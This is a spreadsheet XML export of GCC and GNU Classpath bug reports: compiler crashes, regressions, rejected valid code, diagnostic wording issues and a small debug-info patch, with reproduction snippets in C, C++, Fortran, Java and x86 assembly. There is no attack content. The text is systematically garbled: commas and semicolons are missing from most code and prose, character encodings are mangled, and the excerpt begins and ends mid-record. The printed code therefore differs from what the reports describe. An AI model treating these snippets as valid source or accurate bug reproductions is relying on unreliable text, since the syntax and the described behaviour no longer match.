  ac:   d8 42 fc                fadds  0xfffffffc(%edx)
  af:   d9 5a fc                fstps  0xfffffffc(%edx)
  b2:   7e cc                   jle    80 
Compare it with the code produced by the previous snapshots
(f.i. 20011007 from gcc.gnu.org) or gcc3.0.2:
  d0:   8d 04 0e                lea    (%esi%ecx1)%eax
  d3:   d9 c0                   fld    %st(0)
  d5:   41                      inc    %ecx
  d6:   d8 4c 83 fc             fmuls  0xfffffffc(%ebx%eax4)
  da:   d8 42 fc                fadds  0xfffffffc(%edx)
  dd:   d9 5a fc                fstps  0xfffffffc(%edx)
  e0:   83 c2 04                add    $0x4%edx
  e3:   3b 4d f0                cmp    0xfffffff0(%ebp)%ecx
  e6:   7e e8                   jle    d0 
The Haney test in question becomes 2x slower :-(
Release:
3.1 20011024(567)
Environment:
i686-pc-linux-gnu (PII-400 Linux)
How-To-Repeat:
Confer also to my
http://gcc.gnu.org/ml/gcc/2001-06/msg01554.html
for another recent slowdown in the Haney testsuite</t>
  </si>
  <si>
    <t>GCC-58888</t>
  </si>
  <si>
    <t>[c++11] Rejects-valid: static member with auto and initializer</t>
  </si>
  <si>
    <t>The following code is rejected by 
~/gcc-4.8.2/bin/g++ -std=c++11 test.cpp
########
#include 
struct A
{
  static constexpr auto b{1.0}
}
constexpr decltype(A::b) A::b
int main(int argc char** argv)
{
  std::cout &lt;&lt; 
}
########
with the message
#########
test.cpp:46:30: error: invalid use of 'auto'
   static constexpr auto b{1.0}
                              ^
test.cpp:49:30: error: invalid type in declaration before '' token
 constexpr decltype(A::b) A::b
                              ^
test.cpp:49:30: error: declaration of 'constexpr A::b' outside of class is not definition [-fpermissive]
#########
I'm using g++ (GCC) 4.8.2.
My interpretation of &amp;7.1.6.4 is that this code is valid clang accepts the code and http://stackoverflow.com/questions/12834874/auto-static-in-class-constant-initalization-with-meta-programming also suggests that it is valid.</t>
  </si>
  <si>
    <t>thomas.braun</t>
  </si>
  <si>
    <t>GCC-57419</t>
  </si>
  <si>
    <t>Access control doesn't stop referring to a deleted function</t>
  </si>
  <si>
    <t>Using reference-to-member syntax on a private deleted function in a SFINAE context fails as a hard error as a use of a deleted function. But it can't be accessed in the first place due to the access control. Calling the function instead produces the desired result.
Clang 3.2 accepts this TU but GCC 4.9 rejects:
template
decltype( &amp;q::f ) t( q ) {}
char t( ... ) { return {} }
class c { void f() = delete }
class d { static void f() = delete }
static_assert( sizeof( t( c() ) ) c )
static_assert( sizeof( t( d() ) ) d )</t>
  </si>
  <si>
    <t>GCC-18515</t>
  </si>
  <si>
    <t>[4.0 regression] mmix-knuth-mmixware testsuite failure: gcc.c-torture/execute/simd-4.c execution</t>
  </si>
  <si>
    <t>With LAST_UPDATED: Mon Nov 15 19:30:07 UTC 2004 I get:
gcc.c-torture/execute/simd-4.c execution  -O0
gcc.c-torture/execute/simd-4.c execution  -O1
gcc.c-torture/execute/simd-4.c execution  -O2
gcc.c-torture/execute/simd-4.c execution  -O3 -fomit-frame-pointer
gcc.c-torture/execute/simd-4.c execution  -O3 -g
gcc.c-torture/execute/simd-4.c execution  -Os
With the message in gcc.log being:
*** EXIT code 4242
(a call to abort)
Last known to work on: Mon Nov 15 13:25:54 UTC 2004.
Earliest known to fail with: Mon Nov 15 19:30:07 UTC 2004.
Apparently the last change to that test has a bug.
It looks like an assumption that long is twice the size
of long long which is the same size for mmix-*-*
(and supposedly also some other LP64 targets).
The test needs to be tweaked perhaps using __attribute__ ((__mode__ (SI))) for
the half-the-long-long types.</t>
  </si>
  <si>
    <t>GCC-40969</t>
  </si>
  <si>
    <t>[4.5 regression] Revision 150465 failed gfortran.dg/c_by_val_1.f</t>
  </si>
  <si>
    <t>On Linux/ia64 revision 150465 gave:
FAIL: gfortran.dg/c_by_val_1.f  -O0  execution test
FAIL: gfortran.dg/c_by_val_1.f  -O1  execution test
FAIL: gfortran.dg/c_by_val_1.f  -O2  execution test
FAIL: gfortran.dg/c_by_val_1.f  -O3 -fomit-frame-pointer  execution test
FAIL: gfortran.dg/c_by_val_1.f  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
FAIL: gfortran.dg/c_by_val_1.f  -O3 -fomit-frame-pointer -funroll-loops  execution test
FAIL: gfortran.dg/c_by_val_1.f  -O3 -g  execution test
FAIL: gfortran.dg/c_by_val_1.f  -Os  execution test
Revision 150406 is OK.</t>
  </si>
  <si>
    <t>GCC-47366</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: verify_flow_info failed: missing REG_EH_REGION note in the end of bb 3 with -fnon-call-exceptions -fno-tree-ccp -fno-tree-forwprop</t>
  </si>
  <si>
    <t>Created attachment 23036
reduced testcase
Compiler output:
$ gcc -O -fnon-call-exceptions -fno-tree-ccp -fno-tree-forwprop testcase.C 
testcase.C: In function 'void foo()':
testcase.C:18:1: error: missing REG_EH_REGION note in the end of bb 3
testcase.C:18:1: internal compiler error: verify_flow_info failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r169006 - crash
4.5 r168785 - OK</t>
  </si>
  <si>
    <t>GCC-5790</t>
  </si>
  <si>
    <t>We've found a bug in gcc versions 3.0.0 3.0.2 3.0.3 on Linux only. 
This bug shows only in non-debug version of our executable so every time we encounter the bug it takes much effort to locate the bug in exe assembly code and prove that the bug is actually in gcc and not in exe itself. Since it looks that the bug is not being fixed in the released versions of gcc and it shows from time to time in exe code we prepared a small testcase that demonstrates the bug. 
Attached is file: try.cpp Try.cpp contains the testcase that fails at run-time with segmentation fault if compiled with the command given at the top of the file. 
In short the problem is that gcc compiler assigns the same address for two live temporary variables thus causing the value of the first variable to be overwritten by the value of the second.
Release:
unknown
Environment:
gcc 3.0 - gcc 3.0.4 on Linux only
How-To-Repeat:
Compile try.cpp file with the command given at the top of the file</t>
  </si>
  <si>
    <t>inessa.chernoguz</t>
  </si>
  <si>
    <t>GCC-71250</t>
  </si>
  <si>
    <t>-Wmissing-field-initializers documentation is incomplete</t>
  </si>
  <si>
    <t>When doing some tests on structure initialization and trying to reproduce a warning I was wondering why on
  struct { int a b } x = { 0 }
a warning was not emitted with -Wmissing-field-initializers and the gcc-6 man page did not help:
  -Wmissing-field-initializers
      Warn if a structure's initializer has some fields missing.  For
      example the following code causes such a warning because x.h is
      implicitly zero:
              struct s { int f g h }
              struct s x = { 3 4 }
I eventually found bug 36750. So the GCC documentation should be updated.</t>
  </si>
  <si>
    <t>GCC-77814</t>
  </si>
  <si>
    <t>build fails trying to build eh_arm</t>
  </si>
  <si>
    <t>Created attachment 39729
log from trunk stage 1 bootstrap of libstdc++
Initial bootstrap tries (and fails) to build eh_arm.
/cygdrive/c/users/tim/tim/tim/src/gnu/gcc2/libstdc++-v3/include/bits/std_abs.h:
In function â€˜long long int std::abs(long long int)â€™:
/cygdrive/c/users/tim/tim/tim/src/gnu/gcc2/libstdc++-v3/include/bits/std_abs.h:5
9:3: error: conflicting declaration of C function â€˜long long int std::abs(long l
ong int)â€™
   abs(long long __x) { return __builtin_llabs (__x) }
   ^~~
full log attached
Guessing that the build shouldn't require this compilation.</t>
  </si>
  <si>
    <t>GCC-71569</t>
  </si>
  <si>
    <t>[6 regression] Crash: External definition of template member from template struct</t>
  </si>
  <si>
    <t>Created attachment 38718
gcc -v -save-temps crash.cpp
Check out this:
------------------------------------------------------------
template 
class Foo
{
    template 
    static bool Bar
}
template
template
bool Foo::Bar
int main()
{ }
------------------------------------------------------------
I know that its not valid code because &lt;= 4.9.3 report the following:
5 : error: template declaration of 'bool Bar'
static bool Bar
^
10 : error: expected initializer before '&lt;' token
bool Foo::Bar
^
But since 5.1 and up to 6.1.1 - it just crashes:
crash.cpp:10:14: internal compiler error: in determine_specialization at cp/pt.c:2075
bool Foo::Bar
See the attachment for stack trace.
I couldnt get my hand on a 4.9.4 or 5.0 or something newer than 6.1.1 maybe someone can track the exact version jump.
Must be between 4.9.3 and 5.1.</t>
  </si>
  <si>
    <t>oliver.tale</t>
  </si>
  <si>
    <t>GCC-1694</t>
  </si>
  <si>
    <t>bogus errors during type deduction</t>
  </si>
  <si>
    <t>The attached file produces
current/flt1.C: In function `void Baz(int* const int*)':
current/flt1.C:12: cannot convert `X' to `int' in initialization
current/flt1.C: In function `void Baz(float* const float*)':
current/flt1.C:17: could not convert template argument `0' to `float'
current/flt1.C:18: could not convert template argument `0' to `const float'
float template parms are a gnu extension but why the diagnostic
where they are . I expect line 18 to have no error
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-79453</t>
  </si>
  <si>
    <t>Translator unfriendly string in avr_pgm_check_var_decl</t>
  </si>
  <si>
    <t>In gcc/config/avr/avr.c at line 9831 (inside avr_pgm_check_var_decl()) one can find this error message:
    error (pointer targeting address space %qs must be const
            in %s %q+D
             avr_addrspace[as].name reason node)
The reason variable contains an untranslated text such as variable function parameter return type of function and so on. Building a string out of fragments doesn't play well at all with translations.
I'm afraid every reason should have its own error message.</t>
  </si>
  <si>
    <t>GCC-32035</t>
  </si>
  <si>
    <t>'' may be used uninitialized in this function</t>
  </si>
  <si>
    <t>Hi!
This a very minor thing but it turns out to be a bit annoying: gfortran now and then (rather randomly in my opinion) throws this compilation diagnostic of which I don't seem to make head or tail:
warning: '' may be used uninitialized in this function
This warning looks quite meaningless to me (at best).
Cheers!
Philippe
PS: gfortran -O1 -g -Wall -c Source.f90
Source.f90: In function 'test':
Source.f90:35: warning: '' may be used uninitialized in this function
PPS: don't look for much sense I just tried to cut down some valid sources while keeping this behaviour...
!
      SUBROUTINE Test
!
      IMPLICIT   NONE
!
      LOGICAL ::   Logical_1
!
      INTEGER :: Integer_1
      INTEGER :: Integer_2
      INTEGER :: Integer_3
      INTEGER :: Integer_4
      INTEGER PARAMETER :: Dft = 4
      INTEGER PARAMETER :: Parameter_1 = 1 Parameter_2 = 2
!
      CHARACTER ( LEN = 30 ) ::   String_1
!
      READ ( 5 * ) String_1
!
      Integer_3  = Parameter_1
      Integer_4 = 666
!
      SELECT CASE ( TRIM(String_1) )
      CASE ( A )
        Integer_3  = Parameter_1
      CASE ( B )
        Integer_3  = Parameter_2
      CASE DEFAULT
        STOP
      END SELECT
!
      IF ( Integer_3 .EQ. Parameter_2 ) THEN
!
        READ ( 5 * ) Integer_1
!
        Integer_2 = 0
        DO Integer_4 = 1 Integer_1
!
          READ ( 5 * ) String_1
          SELECT CASE ( TRIM(String_1) )
          CASE ( C )
            Logical_1 = .TRUE.
          CASE ( D )
            Logical_1 = .FALSE.
          CASE DEFAULT
            STOP
          END SELECT
!
        ENDDO
      ENDIF
!
      RETURN
      END SUBROUTINE Test
!
PPPS:
gfortran -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: /USER/philippe/Irix/Gcc_Sources/configure --prefix=/usr1/MICRESS/Philippe/Tools/Gcc --enable-languages=cfortran --disable-maintainer-mode --disable-shared --with-mpfr=/usr1/MICRESS/Philippe/Tools/Mpfr --with-gmp=/usr1/MICRESS/Philippe/Tools/Gmp --with-htmldir
Thread model: posix
gcc version 4.3.0 20070522 (experimental)</t>
  </si>
  <si>
    <t>GCC-26</t>
  </si>
  <si>
    <t>g++ accepts illegal friend declaration</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Sat 4 Mar 2000 02:36:30 -0500 (EST)
 Original-Message-ID: 
 Dear gcc maintainers
 The enclosed file when compiled with:
 &gt; g++ -c gcctest.cpp
 Yields:
 gcctest.cpp:10: Internal compiler error.
 Using gcc 2.95.2 on powerpc-linux-unknown-gnu.
 Note that the friend declaration probably doesn't abide by the standard.
Release:
3.0
How-To-Repeat:
template  class C {
  int foo
}
class A {
  class B {
    typedef C AA
  }
  friend class B::AA
}</t>
  </si>
  <si>
    <t>GCC-48041</t>
  </si>
  <si>
    <t>dwarf2out emits unnecessary null byte in empty .debug_abbrev section</t>
  </si>
  <si>
    <t>Detected by the elfutils dwarflint tool.
Example:
$ echo &gt; empty.c 
$ gcc -g -c empty.c 
$ readelf -x .debug_abbrev empty.o
Hex dump of section '.debug_abbrev':
  0x00000000 00                                  .
Although harmless it might add up if a project has a lot of objects without any real debuginfo in them. There might not actually be many such projects though.
The fix seems easy:
Index: gcc/dwarf2out.c
===================================================================
--- gcc/dwarf2out.c	(revision 170813)
+++ gcc/dwarf2out.c	(working copy)
@@ -110587 +110588 @@
     }
   /* Terminate the table.  */
-  dw2_asm_output_data (1 0 NULL)
+  if (abbrev_die_table_in_use &gt; 1)
+    dw2_asm_output_data (1 0 NULL)
 }
 /* Output a symbol we can use to refer to this DIE from another CU.  */
Bootstraps fine on x86_64-gnu-linux and no regressions seen with make check -k
I'll submit it to gcc-patches when the tree opens up again for stage one.</t>
  </si>
  <si>
    <t>GCC-5929</t>
  </si>
  <si>
    <t>gcc 2.95-3.04 miscompiles anonymous unions inside anonymous structs</t>
  </si>
  <si>
    <t>The members of an anonymous union inside an anonymous struct are aligned with the first member of the anonymous struct. This affects Windows VARIANTs used in C programs. The bug does 
not affect C++ programs.
Release:
Cygwin gcc 2.95-3 RH gcc 2.96.98 gcc 3.0.3 gcc  3.0.4
Environment:
Cygwin/Windows NT4 (gcc 2.95-3)
RH Linux 7.2 (gcc 3.0.3 gcc 3.0.4)
How-To-Repeat:
$ gcc anonbug.c -o anonbug
$ ./anonbug
offset v1 = 0
offset v2 = 4
offset v3 = 8
offset u1 = 4
offset u2 = 4
$ g++ anonbug.c -o anonbug # or MS/Borland/intel C/C++
$ ./anonbug 
offset v1 = 0
offset v2 = 4
offset v3 = 8
offset u1 = 12
offset u2 = 12</t>
  </si>
  <si>
    <t>degnbol</t>
  </si>
  <si>
    <t>GCC-49074</t>
  </si>
  <si>
    <t>[OOP] Defined assignment w/ CLASS arrays: Incomplete error message</t>
  </si>
  <si>
    <t>This test case:
      module foo
        type bar
          integer :: i
          contains
          generic :: assignment (=) =&gt; assgn_bar
          procedure private :: assgn_bar
        end type bar
        contains
        elemental subroutine assgn_bar (a b)
          class (bar) intent (inout) :: a
          class (bar) intent (in) :: b
          select type (b)
          type is (bar)
            a%i = b%i
          end select
          return
        end subroutine assgn_bar
      end module foo
      program main
        use foo
        type (bar) allocatable :: foobar(:)
        allocate (foobar(2))
        foobar = [bar(1) bar(2)]
      end program
Gives:
 gfc init.f90 
Error: Non-scalar base object at (1) currently not implemented
Not a very helpful message if the error is in a large file.  Feedback from help@gfortran.org</t>
  </si>
  <si>
    <t>GCC-4869</t>
  </si>
  <si>
    <t>ICE in fixup_var_refs_1 at function.c:1912</t>
  </si>
  <si>
    <t>gcc-3.1 (specified versions) generates ICE on following 
code which violates aliasing rules. The behaviour of code
is undefined but it should compile. 
/*  This example causes ICE with gcc-3.1 20011030  */
long long rdtsc (void)
{
    long long Result
    __asm__ (       rdtsc\n
            : =ax ( ((unsigned long *) &amp; Result)[0] )
              =dx ( ((unsigned long *) &amp; Result)[1] )
            )
    return Result
}
I'm getting following output from
./xgcc -B./ -c bad.c
bad1.c: In function `rdtsc':
bad1.c:11: Internal compiler error in fixup_var_refs_1 at function.c:1912
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Andris
Release:
gcc-3.1 20011112 (experimental) gcc-3.1 20011030 (experimantal)
Environment:
i686-pc-linux-gnu: gcc-3.1 20011112
i586-pc-msdosdjgpp: gcc-3.1 20011030
How-To-Repeat:
gcc -c bad1.c</t>
  </si>
  <si>
    <t>GCC-36504</t>
  </si>
  <si>
    <t>[4.3/4.4 regression] ICE when building xorg-server with -O3 -fprefetch-loop-arrays</t>
  </si>
  <si>
    <t>when building xorg-server with -O3 -fprefetch-loop-arrays and gcc-4.3.1 on an amd64 linux system we hit an ICE like so:
texenvprogram.c: In function 'emit_combine':
texenvprogram.c:739: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
older versions of gcc seem to work.  building for x86 seems to work.</t>
  </si>
  <si>
    <t>GCC-35657</t>
  </si>
  <si>
    <t>Alignments of DFP types aren't consistent</t>
  </si>
  <si>
    <t>ix86_function_arg_boundary returns PARM_BOUNDARY for TDmode
for ia32. Should it return 128bit? The psABI isn't clear on
it. I think it should be aligned at 128bit.</t>
  </si>
  <si>
    <t>GCC-67779</t>
  </si>
  <si>
    <t>Strange ordering with strings in extended object</t>
  </si>
  <si>
    <t>Created attachment 36421
Source file demonstrating the problem
The attached program constructs a small array of integers and strings and then sorts them. The output is:
 Sorting ...
 Result:
           1
           2
           3
           4
           5
           6
           7
           8
           9
          10
 String = 10         
 String = 1          
 String = 2          
 String = 3          
 String = 4          
 String = 5          
 String = 6          
 String = 7          
 String = 8          
 String = 9           
What is unexpected is the fact that String = 10 comes before String = 1. I have not been able to reduce the code (other than removing the derived type with integers) and still exhibit the odd ordering. The ten integers show that the quicksort routine does its job though. When comparing the strings in a small program String = 10 definitely comes after String = 1 as I would expect.</t>
  </si>
  <si>
    <t>arjen.markus895</t>
  </si>
  <si>
    <t>GCC-11194</t>
  </si>
  <si>
    <t>[3.3.1 regression] ICE in simplify_gen_subreg at simplify-rtx.c</t>
  </si>
  <si>
    <t>3.3 branch 20030615 when building rts.c (Pascal compiler) regression to the
released 3.3.
 ../.././xgcc -B../.././ -B/usr/arm-linux/bin/ -isystem /usr/arm-linux/include
-isystem /usr/arm-linux/sys-include  -c -I. -W -Wall -Wpointer-arith
-Wwrite-strings -Wmissing-prototypes -Wmissing-declarations -g -O2  -save-temps
 /home/doko/3.3/gcc-3.3-3.3.1ds0/src/gcc/p/rts/rts.c
/home/doko/3.3/gcc-3.3-3.3.1ds0/src/gcc/p/rts/rts.c: In function `_p_CStringUTime':
/home/doko/3.3/gcc-3.3-3.3.1ds0/src/gcc/p/rts/rts.c:1848: internal compiler
error: in simplify_gen_subreg at simplify-rtx.c:2742
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-17407</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE in int_mode_for_mode</t>
  </si>
  <si>
    <t>$ gcc --version 
gcc (GCC) 3.5.0 20040909 (experimental) 
Copyright (C) 2004 Free Software Foundation Inc. 
This is free software see the source for copying conditions.  There is NO 
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
$ cat t.i 
typedef struct libxml_xpathCallback { 
  void *ns_uri 
} libxml_xpathCallback 
typedef libxml_xpathCallback libxml_xpathCallbackArray[] 
libxml_xpathCallbackArray *libxml_xpathCallbacks 
void 
foo (void) 
{ 
  if ((*libxml_xpathCallbacks)[3].ns_uri != ((void *)0))  
} 
$ gcc t.i 
t.i: In function `foo': 
t.i:12: internal compiler error: in int_mode_for_mode at stor-layout.c:253 
Happens on at least ia64 and amd64</t>
  </si>
  <si>
    <t>GCC-11600</t>
  </si>
  <si>
    <t>CloneNotSupportedException not checked on super.clone()</t>
  </si>
  <si>
    <t xml:space="preserve">	gcj should complain about the bad class below.  For instance
ecj says:
1. Error in bad.java (at line 5)
        return super.clone ()
               ^^^^^^^^^^^^^^
Unhandled exception type CloneNotSupportedException
	gcj lets this bad code pass.
Environment:
System: Linux escape 2.4.20-13.9 #1 Mon May 12 10:55:37 EDT 2003 i686 i686 i386 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --prefix=/home/green/tools/FSF/HEAD/i --enable-languages=cc++java
How-To-Repeat:
Try compiling this.  It should fail.
public class bad implements Cloneable
{
  public Object clone ()
    {
      return super.clone ()
    }
}</t>
  </si>
  <si>
    <t>GCC-55684</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE in remove_redundant_iv_tests at tree-ssa-loop-ivcanon.c:559</t>
  </si>
  <si>
    <t>/usr/lib/gcc/i586-suse-linux/4.8/cc1 -fpreprocessed fileio.i -quiet -dumpbase fileio.c -mtune=generic -march=i586 -auxbase-strip libavrdude_a-fileio.o -g -O2 -Wno-pointer-sign -Wall -version -fomit-frame-pointer -fmessage-length=0 -fstack-protector -funwind-tables -fasynchronous-unwind-tables -o fileio.s
GNU C (SUSE Linux) version 4.8.0 20121212 [trunk revision 194442] (i586-suse-linux)
        compiled by GNU C version 4.8.0 20121212 [trunk revision 194442] GMP version 5.0.5 MPFR version 3.1.1 MPC version 1.0
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C (SUSE Linux) version 4.8.0 20121212 [trunk revision 194442] (i586-suse-linux)
        compiled by GNU C version 4.8.0 20121212 [trunk revision 194442] GMP version 5.0.5 MPFR version 3.1.1 MPC version 1.0
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: e68fcd130690afd931631ae80bbb1d1f
fileio.c: In function 'ihex2b':
fileio.c:264:12: internal compiler error: in remove_redundant_iv_tests at tree-ssa-loop-ivcanon.c:559
 static int ihex2b(char * infile FILE * inf
            ^
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-32827</t>
  </si>
  <si>
    <t>IMPORT fails for TYPE when also used in INTERFACE</t>
  </si>
  <si>
    <t>I created a program to invoke POSIX's gettimeofday using BIND(C) and encountered
a compile-time problem.  In searching the bug database I discovered 30922 which exhibited a similar problem (now fixed).  I managed to recreate my
problem in a variant of the test program for 30922 so I am submitting
that program instead in the hope that it is simpler and may be more familiar.
The basic problem arises if I take the 30922 test program convert it from
a module to a program and then add a declaration for a TYPE'd variable.
I have further simplified the test program but I have also left the
original 30922 test program in comments.
The test program is:
! Original test program is from bug 30922.
! module test_import
program test_import
  implicit none
  type :: my_type
     integer :: data
  end type my_type
  interface
!     integer function func1(param)
     subroutine func1(param)
       import :: my_type
       type(my_type) :: param
!     end function func1
     end subroutine func1
!      integer function func2(param)
!        import :: my_type
!        type(my_type) value :: param
!      end function func2
  end interface
! end module test_import
  type(my_type) :: x           ! this declaration causes the problem
end program test_import
The error message is:
test_import.f:25.20:
  type(my_type) :: x           ! this declaration causes the problem
                   1
test_import.f:7.17:
  type :: my_type
                2
Error: The type my_type cannot be host associated at (1) because it is blocked by an incompatible object of the same name at (2)
I believe that it is legal Fortran 2003 to incorporate INTERFACE declarations
immediately within a program but I could be mistaken.</t>
  </si>
  <si>
    <t>sysmaint</t>
  </si>
  <si>
    <t>GCC-62315</t>
  </si>
  <si>
    <t>do not print typename in diagnostic if the original code does not have it</t>
  </si>
  <si>
    <t>/home/manuel/test2/src/gcc/testsuite/g++.dg/parse/typedef2.C:2:42: error: need â€˜typenameâ€™ before â€˜typename B::X::Yâ€™ because â€˜typename B::Xâ€™ is a dependent scope
 template  struct A { typedef B::X::Y Z } // { dg-error  }
                                          ^
It is confusing to say that typename is needed before 'typename B::X::Y'.</t>
  </si>
  <si>
    <t>GCC-24791</t>
  </si>
  <si>
    <t>ICE on invalid instantiation of template's static member</t>
  </si>
  <si>
    <t>tracked down sample is:
$ cat xx.cc
template 
struct A
{
        int get_val() const
        static int val_
}
template
int A::get_val() const
{
        return val_
}
template    // this is invalid: works with template 
int A::val_(0)
// must instantiate to get ICE
template class A
$ g++ -v
Reading specs from /tools/snapshot/toolsbox-3.5.1.4pre.20051110/bin/../lib/gcc/i686-pc-linux-gnu/3.4.4/specs
Configured with: /tools/snapshot/src/sapc154/toolsbox-3.5.1.4pre.20051110/buildroot/gcc/gcc-3.4.4/configure --with-gnu-as --with-gnu-ld --enable-threads=posix --with-as=/tools/snapshot/toolsbox-3.5.1.4pre.20051110//i686-pc-linux-gnu/bin/as --with-ld=/tools/snapshot/toolsbox-3.5.1.4pre.20051110//i686-pc-linux-gnu/bin/ld --with-local-prefix=/tools/snapshot/toolsbox-3.5.1.4pre.20051110/ --disable-nls --prefix=/tools/snapshot/toolsbox-3.5.1.4pre.20051110/
Thread model: posix
gcc version 3.4.4
$ g++ -v -c xx.cc
Reading specs from /tools/snapshot/toolsbox-3.5.1.4pre.20051110/bin/../lib/gcc/i686-pc-linux-gnu/3.4.4/specs
Configured with: /tools/snapshot/src/sapc154/toolsbox-3.5.1.4pre.20051110/buildroot/gcc/gcc-3.4.4/configure --with-gnu-as --with-gnu-ld --enable-threads=posix --with-as=/tools/snapshot/toolsbox-3.5.1.4pre.20051110//i686-pc-linux-gnu/bin/as --with-ld=/tools/snapshot/toolsbox-3.5.1.4pre.20051110//i686-pc-linux-gnu/bin/ld --with-local-prefix=/tools/snapshot/toolsbox-3.5.1.4pre.20051110/ --disable-nls --prefix=/tools/snapshot/toolsbox-3.5.1.4pre.20051110/
Thread model: posix
gcc version 3.4.4
 /tools/snapshot/toolsbox-3.5.1.4pre.20051110/bin/../libexec/gcc/i686-pc-linux-gnu/3.4.4/cc1plus -quiet -v -iprefix /tools/snapshot/toolsbox-3.5.1.4pre.20051110/bin/../lib/gcc/i686-pc-linux-gnu/3.4.4/ -D_GNU_SOURCE xx.cc -quiet -dumpbase xx.cc -mtune=pentiumpro -auxbase xx -version -o /tmp/ccuQDWYE.s
ignoring nonexistent directory /tools/snapshot/toolsbox-3.5.1.4pre.20051110/bin/../lib/gcc/i686-pc-linux-gnu/3.4.4/../../../../i686-pc-linux-gnu/include
ignoring duplicate directory /tools/snapshot/toolsbox-3.5.1.4pre.20051110//lib/gcc/i686-pc-linux-gnu/3.4.4/../../../../include/c++/3.4.4
ignoring duplicate directory /tools/snapshot/toolsbox-3.5.1.4pre.20051110//lib/gcc/i686-pc-linux-gnu/3.4.4/../../../../include/c++/3.4.4/i686-pc-linux-gnu
ignoring duplicate directory /tools/snapshot/toolsbox-3.5.1.4pre.20051110//lib/gcc/i686-pc-linux-gnu/3.4.4/../../../../include/c++/3.4.4/backward
ignoring duplicate directory /tools/snapshot/toolsbox-3.5.1.4pre.20051110//lib/gcc/i686-pc-linux-gnu/3.4.4/include
ignoring nonexistent directory /tools/snapshot/toolsbox-3.5.1.4pre.20051110//lib/gcc/i686-pc-linux-gnu/3.4.4/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /tools/snapshot/toolsbox-3.5.1.4pre.20051110/bin/../lib/gcc/i686-pc-linux-gnu/3.4.4/../../../../include/c++/3.4.4
 /tools/snapshot/toolsbox-3.5.1.4pre.20051110/bin/../lib/gcc/i686-pc-linux-gnu/3.4.4/../../../../include/c++/3.4.4/i686-pc-linux-gnu
 /tools/snapshot/toolsbox-3.5.1.4pre.20051110/bin/../lib/gcc/i686-pc-linux-gnu/3.4.4/../../../../include/c++/3.4.4/backward
 /tools/snapshot/toolsbox-3.5.1.4pre.20051110/bin/../lib/gcc/i686-pc-linux-gnu/3.4.4/include
 /tools/snapshot/toolsbox-3.5.1.4pre.20051110//include
 /usr/include
End of search list.
GNU C++ version 3.4.4 (i686-pc-linux-gnu)
        compiled by GNU C version 3.4.4.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
xx.cc:18: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-19117</t>
  </si>
  <si>
    <t>gcc -v should include target information</t>
  </si>
  <si>
    <t>It used to via the specs information.
$ gcc -v
Using built-in specs.
Configured with: ../gcc/configure --prefix=/home/ig25
--enable-languages=cc++f95 : (reconfigured) ../gcc/configure
--prefix=/home/ig25 --enable-languages=cc++f95
Thread model: posix
gcc version 4.0.0 20041221 (experimental)
This would make reporting bugs easier.</t>
  </si>
  <si>
    <t>CLASSPATH-27835</t>
  </si>
  <si>
    <t>ArrayIndexOutOfBoundsException in CarioGraphics2D.fillRect</t>
  </si>
  <si>
    <t>I just tested my image-viewer application with classpath cvs 2006.05.31. Apart from the repaint issue (#27833) and the JSplitPane scrolling problems I get the following exception:
java.lang.ArrayIndexOutOfBoundsException: While writing data elements x=120 y=
119 width=120 height=120 scanlineStride=120 offset=14400 data.getSize()=144
00 data.getOffset()=0: java.lang.ArrayIndexOutOfBoundsException: 14400
   at java.awt.image.SinglePixelPackedSampleModel.setDataElements(SinglePixelPac
kedSampleModel.java:372)
   at java.awt.image.WritableRaster.setDataElements(WritableRaster.java:120)
   at java.awt.image.BufferedImage.setRGB(BufferedImage.java:622)
   at gnu.java.awt.peer.gtk.BufferedImageGraphics.updateBufferedImage(BufferedIm
ageGraphics.java:126)
   at gnu.java.awt.peer.gtk.BufferedImageGraphics.fill(BufferedImageGraphics.jav
a:162)
   at gnu.java.awt.peer.gtk.CairoGraphics2D.fillRect(CairoGraphics2D.java:872)
   at niffler.ThumbnailsManager.createThumbnailImage(ThumbnailsManager.java:477)
   at niffler.ThumbnailsManager.checkCreateThumbnail(ThumbnailsManager.java:246)
   at niffler.ThumbnailsManager$BackgroundLoader.run(ThumbnailsManager.java:692)
-W- BackgroundLoader: FAILED '/windows/C/temp/Pentax-DL/2006_05_25-altona-rathau
s-zenitar/IMGP1353_pt.JPG'
Looks like an off-by-one error in CairoGraphics2D or BufferedImageGraphics
but I don't have a simple testcase. Perhaps the data reported by the exception is enough to hunt the bug?
BTW previous versions of classpath would just die somewhere when trying to create the thumbnail images (jamvm deadlocked and I never got useful stacktraces)  so the above exception is a clear improvement.
Best Norman</t>
  </si>
  <si>
    <t>GCC-43256</t>
  </si>
  <si>
    <t>[OOP] TBP with missing optional arg</t>
  </si>
  <si>
    <t>Consider the following code:
module module_myobj
  implicit none
  type :: myobj
  contains
    procedure :: myfunc
  end type
contains
  function myfunc(this status)
    class(myobj) intent(in) :: this
    integer intent(out) optional  :: status
    character(len=80)               :: myfunc
    if (present(status)) then
      write (**) 'myfunc: status is present.'
    else
      write (**) 'myfunc: status is not present.'
    end if
    myfunc = ' '
  end function
end module
program test_optional
  use :: module_myobj
  implicit none
  character(len=80) :: res
  integer           :: status
  type(myobj)       :: myinstance
  res = myfunc(myinstance)         ! OK
